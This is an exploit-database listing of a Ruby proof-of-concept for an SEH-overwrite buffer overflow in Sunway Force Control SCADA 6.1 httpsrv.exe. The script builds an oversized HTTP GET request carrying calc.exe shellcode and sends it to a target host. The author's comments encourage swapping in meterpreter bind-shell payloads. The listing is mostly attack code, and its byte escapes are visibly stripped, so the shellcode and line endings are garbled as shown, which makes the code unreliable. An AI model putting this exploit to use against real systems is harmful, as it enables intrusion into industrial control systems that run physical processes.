
# Title : Sunway Force Control SCADA 6.1 SP3 httpsrv.exe Exploit
# Published : 2011-08-26
# Author :
# Previous Title : Wireshark console.lua pre-loading vulnerability
# Next Title : VMware Update Manager Directory Traversal


# Sunway Force Control SCADA httpsvr.exe Exploit
# Exploitable with simple SEH Overwrite technique
# Tested on XP SP0 English
# Probably will work on XP SP3 if you find a non-SafeSEH dll for the p/p/r pointer
# Canberk BOLAT | @cnbrkbolat
# cbolat.blogspot.com 
# for fun ;)
#
# notez: other payloads not working stable because of memory region's status.
# i tested meterpreter/bind_tcp and others some of them not work because of
# trying to write to unwritable memory regions.
# if you write some asm to change the access protection of the memory region
# it can work. try it, do it!
#
# Vendor: http://www.sunwayland.com.cn/

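# Opens a TCP connection to @ip:@port, writes +packet+, reads up to 1024 bytes
# of reply and closes the socket. Returns true when the connect and write
# succeed, false otherwise. An error while reading the reply still propagates,
# as it did before.
#
# NOTE: a top-level `def send` overrides Object#send for every object in the
# process; it is kept under this name only because the call site below uses it.
# TCPSocket also needs `require 'socket'`, which this script never does.
def send(packet)
  sock = nil
  begin
    sock = TCPSocket.new(@ip, @port)
    sock.write(packet)
  rescue StandardError
    # StandardError only: the previous `rescue Exception` also swallowed
    # Interrupt and SystemExit, so the script could not be stopped cleanly.
    return false
  else
    # Reply is read but never used.
    sock.recv(1024)
    true
  ensure
    # Close on every path; a failed write previously left the socket open.
    sock.close if sock
  end
end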

# Target host is the first command-line argument; the port is fixed at 80.
# Both are instance variables on main so that `send` above can read them.
@ip, @port = ARGV.first, 80

# windows/exec CMD=calc.exe
# NOTE(review): as rendered here the literal contains no backslashes, so each
# "xNN" is three plain characters rather than one byte; the listing appears to
# have lost its escape sequences in extraction. shellcode.length, used for the
# padding below, is therefore the length of these plain characters.
shellcode = "xb8xd5x45x06xc4xdaxdexd9x74x24xf4x5bx33xc9" +
			"xb1x33x31x43x12x03x43x12x83x3exb9xe4x31x3c" +
			"xaax60xb9xbcx2bx13x33x59x1ax01x27x2ax0fx95" +
			"x23x7exbcx5ex61x6ax37x12xaex9dxf0x99x88x90" +
			"x01x2cx15x7exc1x2exe9x7cx16x91xd0x4fx6bxd0" +
			"x15xadx84x80xcexbax37x35x7axfex8bx34xacx75" +
			"xb3x4exc9x49x40xe5xd0x99xf9x72x9ax01x71xdc" +
			"x3bx30x56x3ex07x7bxd3xf5xf3x7ax35xc4xfcx4d" +
			"x79x8bxc2x62x74xd5x03x44x67xa0x7fxb7x1axb3" +
			"xbbxcaxc0x36x5ex6cx82xe1xbax8dx47x77x48x81" +
			"x2cxf3x16x85xb3xd0x2cxb1x38xd7xe2x30x7axfc" +
			"x26x19xd8x9dx7fxc7x8fxa2x60xafx70x07xeax5d" +
			"x64x31xb1x0bx7bxb3xcfx72x7bxcbxcfxd4x14xfa" +
			"x44xbbx63x03x8fxf8x9cx49x92xa8x34x14x46xe9" +
			"x58xa7xbcx2dx65x24x35xcdx92x34x3cxc8xdfxf2" +
			"xacxa0x70x97xd2x17x70xb2xb0xf6xe2x5ex19x9d" +
			"x82xc5x65"
			
# Request path built in the order the author gives: filler, next-SEH record,
# handler address, NOP sled, shellcode, then padding up to a fixed total.
# NOTE(review): the "x.." and "rn" sequences are rendered without backslashes
# here, so they are the literal letters as written, not byte escapes.
payload = "H" * 1599
payload << "xebx06x90x90" # Pointer to Next SE Handler
payload << [0x719737FA].pack("V*") # SEH Handler - p/p/r
payload << "x90" * 40
payload << shellcode
# String#* raises ArgumentError if shellcode.length ever exceeds 4058.
payload << "x90" * (4058 - shellcode.length)

# The whole payload goes into the request line; the port is fixed at 80 above.
pack = "GET /#{payload} HTTP/1.1rn"
pack << "Host: http://#{@ip}:#{@port}rnrn"

# Prints only when `send` returns true; a refused connection prints nothing.
puts "packet sended." if send(pack)